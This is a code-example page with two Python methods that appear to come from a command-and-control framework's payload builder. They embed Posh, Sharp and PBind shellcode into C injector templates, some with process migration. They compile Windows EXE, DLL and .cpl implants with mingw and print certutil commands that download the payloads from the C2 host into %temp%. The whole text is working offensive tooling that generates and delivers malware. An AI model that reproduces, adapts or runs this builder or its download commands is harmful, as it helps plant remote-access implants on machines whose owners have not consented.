Exemple #1
0
    def CreateEXEFiles(self, sourcefile, payloadtype, name=""):
        # Get the first URL and the default migration process from the config
        migrate_process = DefaultMigrationProcess
        if "\\" in migrate_process and "\\\\" not in migrate_process:
            migrate_process = migrate_process.replace("\\", "\\\\")

        if payloadtype == PayloadType.Posh_v2:
            # Get the Posh shellcode
            with open("%s%sPosh_v2_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
            with open("%s%sPosh_v2_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)

        elif payloadtype == PayloadType.Posh_v4:
            # Get the Posh shellcode
            with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
            with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)

        elif payloadtype == PayloadType.Sharp:
            # Get the Sharp shellcode
            with open("%s%sSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
            with open("%s%sSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)

        elif payloadtype == PayloadType.PBind:
            # Get the Posh shellcode
            with open("%s%sPBind_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
            with open("%s%sPBind_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)

        elif payloadtype == PayloadType.PBindSharp:
            # Get the Sharp shellcode
            with open("%s%sPBindSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
            with open("%s%sPBindSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
                shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)

        # Create the raw C file from the template
        with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
            content = f.read()
        content = str(content) \
            .replace("#REPLACEME#", str(shellcode64)) \
            .replace("#REPLACEMEPROCESS#", migrate_process)
        with open("%s%s%s_%s_x64.c" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), 'w') as f:
            f.write(content)

        # Create the raw C file from the template
        with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
            content = f.read()
        content = str(content) \
            .replace("#REPLACEME#", str(shellcode32)) \
            .replace("#REPLACEMEPROCESS#", migrate_process)
        with open("%s%s%s_%s_x86.c" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), 'w') as f:
            f.write(content)

        # Compile the exe or dll depinding if there is a dllmain and process_attach
        if sourcefile.lower().endswith(".dll.c"):
            sourcefile = sourcefile.replace(".c", "")
            subprocess.check_output("x86_64-w64-mingw32-gcc -w -shared %s%s%s_%s_x64.c -o %s%s%s_%s_x64.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile, self.BaseDirectory, name, payloadtype.value, sourcefile), shell=True)
            subprocess.check_output("i686-w64-mingw32-gcc -w -shared %s%s%s_%s_x86.c -o %s%s%s_%s_x86.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile, self.BaseDirectory, name, payloadtype.value, sourcefile), shell=True)
            self.QuickstartLog("Payload written to: %s%s%s_%s_x64.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile))
            self.QuickstartLog("Payload written to: %s%s%s_%s_x86.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile))
            if "CPlApplet" in content:
                shutil.copy(f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x64.dll", f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x64.dll.cpl")
                shutil.copy(f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x86.dll", f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x86.dll.cpl")
                self.QuickstartLog("Payload written to: %s%s%s_%s_x64.dll.cpl" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
                self.QuickstartLog("Payload written to: %s%s%s_%s_x86.dll.cpl" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
        else:
            subprocess.check_output("x86_64-w64-mingw32-gcc -w %s%s%s_%s_x64.c -o %s%s%s_%s_x64.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", ""), self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), shell=True)
            subprocess.check_output("i686-w64-mingw32-gcc -w %s%s%s_%s_x86.c -o %s%s%s_%s_x86.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", ""), self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), shell=True)
            self.QuickstartLog("Payload written to: %s%s%s_%s_x64.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
            self.QuickstartLog("Payload written to: %s%s%s_%s_x86.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
Exemple #2
0
    def CreateEXE(self, name=""):
        with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name),
                  'rb') as f:
            sc64 = f.read()
        hexcode = "".join("\\x{:02x}".format(c) for c in sc64)
        sc64 = formStr("char sc[]", hexcode)

        with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc64))
        self.QuickstartLog("64bit EXE Payload written to: %s%sPosh64.exe" %
                           (self.BaseDirectory, name))
        filename = "%s%sPosh64.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc64))
        migrate_process = DefaultMigrationProcess
        if "\\" in migrate_process and "\\\\" not in migrate_process:
            migrate_process = migrate_process.replace("\\", "\\\\")
        ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
        self.QuickstartLog(
            "64bit EXE Payload written to: %s%sPosh64_migrate.exe" %
            (self.BaseDirectory, name))
        filename = "%s%sPosh64_migrate.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name),
                  'rb') as f:
            sc32 = f.read()
        hexcode = "".join("\\x{:02x}".format(c) for c in sc32)
        sc32 = formStr("char sc[]", hexcode)

        with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc32))
        self.QuickstartLog("32bit EXE Payload written to: %s%sPosh32.exe" %
                           (self.BaseDirectory, name))
        filename = "%s%sPosh32.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc32))
        ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
        self.QuickstartLog(
            "32bit EXE Payload written to: %s%sPosh32_migrate.exe" %
            (self.BaseDirectory, name))
        filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        try:
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex64"
            filename = randomuri()
            self.QuickstartLog(Colours.END)
            self.QuickstartLog(
                "Download Posh64 & Posh32 executables using certutil:" +
                Colours.GREEN)
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.exe" %
                (uri, filename))
            if os.name == 'nt':
                compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            else:
                compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64.c -o %s%sPosh64.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32.c -o %s%sPosh32.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            subprocess.check_output(compile64, shell=True)
            subprocess.check_output(compile32, shell=True)
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex86"
            filename = randomuri()
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.exe" %
                (uri, filename))
            if os.name == 'nt':
                compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            else:
                compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            subprocess.check_output(compile64, shell=True)
            subprocess.check_output(compile32, shell=True)

            self.QuickstartLog(Colours.END)
            self.QuickstartLog(
                "Download Posh/Sharp x86 and x64 shellcode from the webserver:"
                + Colours.GREEN)
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/64/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/86/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/64/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/86/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))

        except Exception as e:
            print(e)
            print(
                "apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common"
            )